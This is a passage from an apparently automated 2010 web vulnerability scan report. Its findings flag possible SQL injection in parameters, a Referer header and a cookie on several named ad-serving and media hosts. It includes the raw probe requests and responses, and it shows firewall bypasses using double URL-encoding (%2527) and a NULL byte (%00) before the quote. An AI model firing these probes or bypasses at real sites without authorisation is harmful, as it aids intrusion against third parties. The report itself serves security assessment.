Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:13:31 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19679

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

2.4. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The referer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the referer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com'&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 03:10:15 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com''&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:15 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19665

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

2.5. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The siteID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the siteID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858'&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 03:10:26 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858''&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:27 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19663

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

2.6. http://software-security-assurance.techweb.com/util/download.jhtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://software-security-assurance.techweb.com
Path:   /util/download.jhtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /util/download.jhtml%2527 HTTP/1.1
Host: software-security-assurance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 12 Dec 2010 03:25:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:25:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=LRRYECM5WM5JZQE1GHPSKH4ATMY32JVN; path=/
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 311

<HTML>
<!-- This file is for Error code #403 - Forbidden -->
<HEAD>
<TITLE>Forbidden (403)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Forbidden (403)</H1>

You have requested data
...[SNIP]...

Request 2

GET /util/download.jhtml%2527%2527 HTTP/1.1
Host: software-security-assurance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 03:25:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:25:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=PUQQAER4TXVSJQE1GHPCKHWATMY32JVN; path=/
Location: http://software-security-assurance.techweb.com/nopagefound.jhtml?untiRecursion=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


2.7. http://software-security-assurance.techweb.com/util/download.jhtml [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://software-security-assurance.techweb.com
Path:   /util/download.jhtml

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /util/download.jhtml HTTP/1.1
Host: software-security-assurance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 12 Dec 2010 03:24:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:24:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=U4VSBB0KJWZFJQE1GHPCKH4ATMY32JVN; path=/
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 311

<HTML>
<!-- This file is for Error code #403 - Forbidden -->
<HEAD>
<TITLE>Forbidden (403)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Forbidden (403)</H1>

You have requested data
...[SNIP]...

Request 2

GET /util/download.jhtml HTTP/1.1
Host: software-security-assurance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 03:24:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:24:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ZONLRLQORLJBJQE1GHPSKHWATMY32JVN; path=/
Location: http://software-security-assurance.techweb.com/nopagefound.jhtml?untiRecursion=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


2.8. http://redcated/SAS/jview/167465860/direct [MUID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /SAS/jview/167465860/direct

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /SAS/jview/167465860/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9%00'; ID=optout;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 5766
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:16 GMT
Connection: close


document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = f
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /SAS/jview/167465860/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9%00''; ID=optout;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 233
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:16 GMT
Connection: close

document.write("<a target=_blank href=\"http://clk.atdmt.com/goiframe/186788453/167465860/direct\" onclick=\"(new Image).src='http://t.redcated'\"><img src=\"http://ec.redcated/b/WRSASSAS8S10/TCH_33
...[SNIP]...

2.9. http://redcated/SAS/jview/167465860/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /SAS/jview/167465860/direct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /SAS/jview/167465860/direct?1%00'=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 5766
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:18 GMT
Connection: close


document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = f
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /SAS/jview/167465860/direct?1%00''=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 233
Content-Type: text/javascript
Expires: 0
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:25:18 GMT
Connection: close

